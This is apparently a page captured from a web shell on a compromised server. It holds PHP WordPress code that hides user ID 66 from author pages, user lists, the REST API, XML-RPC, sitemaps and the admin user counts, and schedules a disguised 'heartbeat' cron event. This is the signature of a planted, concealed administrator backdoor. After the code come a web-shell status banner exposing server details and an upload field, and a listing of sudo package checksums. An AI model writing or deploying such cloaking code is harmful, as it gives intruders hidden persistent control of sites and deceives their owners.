add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/lib/dpkg/info/ |
Upload File : |
d44c87138009299dd482303b0a783070 usr/bin/cvtsudoers 05b6d8fc645e5379ced0c70a14c09dcd usr/bin/sudo 10cd5868a7994d399d41e09ac8a9cf4e usr/bin/sudoreplay 2a79284afa548ab275794da2bcd0297a usr/include/sudo_plugin.h 9eb3041fcbb7ba1a64664d7a7a13cc15 usr/lib/tmpfiles.d/sudo.conf d1da3f81fdf93082f1898ebe418fbc4e usr/libexec/sudo/audit_json.so 66c570f09de0c0e004fc18aa47b4eb5b usr/libexec/sudo/group_file.so 250caa503f27a3d3e23fa7d748495d08 usr/libexec/sudo/libsudo_util.so.0.0.0 11ce2058ccc5f0c2e85fd0ef99f6b53e usr/libexec/sudo/sesh 310111ffc1be966f2464ca01b267b5f2 usr/libexec/sudo/sudo_intercept.so aac2a8d6acef1cf2fb394b244d510e5f usr/libexec/sudo/sudo_noexec.so 0872228f400a2b91c8a5686a81f4e498 usr/libexec/sudo/sudoers.so 36927be4ac2e1aeefcd2661cd866f005 usr/libexec/sudo/system_group.so 3d9d6d2fe7f4ec0e75ffeb18db576d51 usr/sbin/sudo_logsrvd 98520771e9dd2e4db6b4b56aa826b349 usr/sbin/sudo_sendlog 1b18ea8714a756e39c07a0b69d90f589 usr/sbin/visudo 067eeaeb07c8d3932889d3a623553474 usr/share/apport/package-hooks/source_sudo.py e72235f12bdfc25aad256ff4c77da851 usr/share/doc/sudo/CONTRIBUTING.md 3875d1dbeea168b47a76da6ca7d8f06c usr/share/doc/sudo/CONTRIBUTORS.md.gz 585ad715576a37a3c187ea36a888c169 usr/share/doc/sudo/HISTORY.md 5731cc1a11b0e8fbd65bc95d060c34ac usr/share/doc/sudo/NEWS.Debian.gz 0909aa9620462a0b32de06299aaaf7e5 usr/share/doc/sudo/NEWS.gz fe7a13742bd28e0a625350cd4649848a usr/share/doc/sudo/OPTIONS 120548e31bcbe3f001dedf066803d4e2 usr/share/doc/sudo/README.Debian 21528bf88c59c28a69e44fe48a92539a usr/share/doc/sudo/README.md c2ef189dc79219c518b64614f675aaa3 usr/share/doc/sudo/SECURITY.md fc6939fcdab1a6eef4dc70e4c65f8567 usr/share/doc/sudo/TROUBLESHOOTING.md.gz 9f85aa4b9430fab66baee867eedc4382 usr/share/doc/sudo/UPGRADE.md.gz d47efa041ce70ab94310f0128cbd4774 usr/share/doc/sudo/changelog.Debian.gz 9da1600871fc9963ae8291dfa0d30e8c usr/share/doc/sudo/copyright b8ca0683addccd3cd8129f1d29cb640f usr/share/doc/sudo/examples/cvtsudoers.conf 6d004cb4db5944483c0e630655006ca4 usr/share/doc/sudo/examples/pam.conf 8c714b777580faea54a2eb6d5f17ad1d usr/share/doc/sudo/examples/sudo.conf ad0ba586da300ae3ba46312ad744a6e2 usr/share/doc/sudo/examples/sudo_logsrvd.conf fe107d118e6db0cd9504f972cc2b1623 usr/share/doc/sudo/examples/sudoers 31a63c830c059acf437e4c7878d49481 usr/share/doc/sudo/examples/sudoers.dist b8d400a78bf70b2c2e56788e4955f8f1 usr/share/doc/sudo/examples/syslog.conf 7e62425b678483fac3b08e8b519d151a usr/share/lintian/overrides/sudo 19d8406e98cd2523528a5d35f3d4d155 usr/share/man/man1/cvtsudoers.1.gz ffa972f9aee0ecdfa0c1e2168ecf4a94 usr/share/man/man5/sudo.conf.5.gz 49c1d3fe528997d9078324dc8c2f3845 usr/share/man/man5/sudo_logsrv.proto.5.gz fe68a75dea226775a340690d6dd066ed usr/share/man/man5/sudo_logsrvd.conf.5.gz 650230f1b797f5777547662ffaa8bb84 usr/share/man/man5/sudo_plugin.5.gz 68fa8a5854ca6659dd80c4e20dddf079 usr/share/man/man5/sudoers.5.gz b5ddc09eb4cbd46ea720436218526f69 usr/share/man/man5/sudoers_timestamp.5.gz 0b63b3f1828f18cac8f0aa56fd44fdba usr/share/man/man8/sudo.8.gz 33197602dca786f758e3726aaedbb88d usr/share/man/man8/sudo_logsrvd.8.gz 2d6269ed492ae4e60a3d0da009e8b560 usr/share/man/man8/sudo_root.8.gz 39efb92740710638a48fc14e2e3609b6 usr/share/man/man8/sudo_sendlog.8.gz 52abb350c4034008caa46e30ff787b6b usr/share/man/man8/sudoreplay.8.gz 20a325cee4d488635ecceb8dd09f65ee usr/share/man/man8/visudo.8.gz